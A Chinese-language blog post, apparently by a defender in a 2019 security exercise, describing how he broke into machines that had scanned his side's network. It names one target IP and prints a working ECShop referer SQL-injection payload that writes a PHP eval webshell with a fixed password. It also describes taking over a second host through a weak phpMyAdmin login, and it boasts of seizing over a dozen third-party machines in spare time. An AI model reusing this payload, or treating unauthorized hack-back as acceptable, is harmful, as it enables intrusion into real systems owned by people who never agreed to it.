记一次护网拿下公鸡队的肉鸡

前言

19年6月份的事了,突然想起来就写上吧

事发起因

因为是蓝队,用的是我司的天眼,在监控的时候无意看到有一个ip针对我方资产做了批量扫描,于是登录我司的威胁情报中心查看该ip,发现被标位可疑IP,根据领导指示,尝试反日

信息收集

百度ip发现为腾讯云

扫端口发现3389,3306、80开启,尝试弱口令登录失败,打开129.204.119.104,发现是一个商场网站,进一步测试发现是ecshop系统

通过后台登陆处得到版本信息,先知搜索一下该版本的漏洞,发现一个referer注入
先知文章点这里

总结得到的信息:

1.目标是一个商城网站,商场系统为ecshop
2.开了3389,用的是win服务器

开始日

尝试一下注入,发现报错,说明存在注入:

根据先知的文章,进一步利用漏洞写进了shell:

1
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}

导出1.php,密码1337,相当于

1
file_put_contents('1.php','<?php eval($_POST[1337]); ?>')

菜刀,启动!

翻apache日志,down之
然后就是找记录了,把可疑ip提交,封禁
因为是肉鸡,继续深入已经没有意义并且没有时间,断了连接之后下一台
139.99..
还是老样子,简单的信息收集

通过收集的信息发现3389、3306开着,存在l.php,通过l.php的标题发现为phpstdy2014版,打开phpmyadmin,尝试弱口令,登录成功,phpmyadmin写shell就不细说了
通过whoami发现是管理员组,然后

连接之

接下来就是各种翻系统日志
down之,提交加分
就这样在防守期间利用空余的时间拿了十几台肉鸡,有一台还在开youjizz,全屏的那种


声明:
本文章用于学习交流,严禁用于非法操作,出现后果一切自行承担,阅读此文章表示你已同意本声明。

Disclaimer:
This article is for study and communication. It is strictly forbidden to use it for illegal operations. All consequences shall be borne by yourself. Reading this article means that you have agreed to this statement.